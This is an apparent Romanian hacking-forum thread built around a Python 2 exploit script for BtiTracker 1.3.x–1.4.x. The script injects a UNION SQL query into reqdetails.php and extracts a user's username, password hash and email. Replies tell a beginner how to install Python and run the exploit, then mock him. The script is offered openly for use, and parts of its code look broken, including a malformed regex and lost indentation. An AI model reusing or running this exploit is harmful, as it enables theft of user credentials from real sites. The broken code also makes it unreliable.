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Guest .TinKode.

BtiTracker 1.3.x – 1.4.x Exploit [Python]

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Guest .TinKode.

#!/usr/bin/env python# 
# ______ ____ __ [ xpl0it ] #
#/\__ _\ /\ _`\ __/\ \__ #
#\/_/\ \/ ___\ \,\L\_\ __ ___ __ __ _ __ /\_\ \ ,_\ __ __ #
# \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \ #
# \_\ \__/\ \/\ \/\ \L\ \/\ __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ #
# /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\ \ \_\ \__\\/`____ \ #
# \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/ \/_/ \/_/\/__/ `/___/> \ #
# _________________ /\___/ #
# www.insecurity.ro \/__/ #
# #
# [ BtiTracker 1.3.X - 1.4.X Exploit ] #
# Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches #
# Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff #
# Because we care, we're security aware #

import sys, urllib2, re

if len(sys.argv) < 2:
print "==============================================================="
print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
print "==============================================================="
print "= Discovered and coded by TinKode ="
print "= www.InSecurity.ro ="
print "= ="
print "= Local Command: ="
print "= ./isr.py [http://webshit] [ID] ="
print "= ="
print "==============================================================="

if len(sys.argv) < 3:
id = 1
id = sys.argv[2]

shit = sys.argv[1]
if shit[-1:] != "/":
shit += "/"

url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
print "\n"
print "============================================="
print "================= InSecurity ================"
print "============================================="

html = urllib2.urlopen(url).read()
slobod = re.findall(r"--(.*)\[0-9a-fA-F]{32})\.*)--", html)
if len(slobod) > 0:
print "ID : " + str(id)
print "Username : " + slobod[0][0]
print "Password : " + slobod[0][1]
print "EMail : " + slobod[0][2]
print "============================================="
print "================= InSecurity ================"
print "============================================="
print "Ai luat-o la gaoaza..."

#InSecurity.ro - Romania

Source: BtiTracker 1.3.X - 1.4.X Exploit

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Descarca asta: http://downloads.activestate.com/ActivePython/releases/

Intrii in cmd, mergi in directorul in care ai instalat python folosind "cd", copiezi in acel directorul exploitul, pui extensia ".py", apoi rulezi "python exploit.py". Parca asa era cu Active Python.

Pff, dar mai bine lasa, mai intai sa prinzi notiunile de baza, apoi treci la folosirea exploiturilor. Oricum sunt tutoriale despre cum sa faci asta.

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Nytro nu am inteles mai nimic din ce ai zis:D Dar oricum...acuma trebuie sa invat notiuunile de baza

Cum de te-ai prins? Era greu sa cauti pe google ".py extension" sa vezi ca se refera la extensia care o foloseste limbajul de programare Python? Dupa care cautai "Python Programming Language" si invatai limbajul de programare sau aruncai un ochi peste.

Data viitoare foloseste Google si nu mai pune intrebari stupide! Foloseste-ti creierul.

Si stai linistit(a), am revenit.

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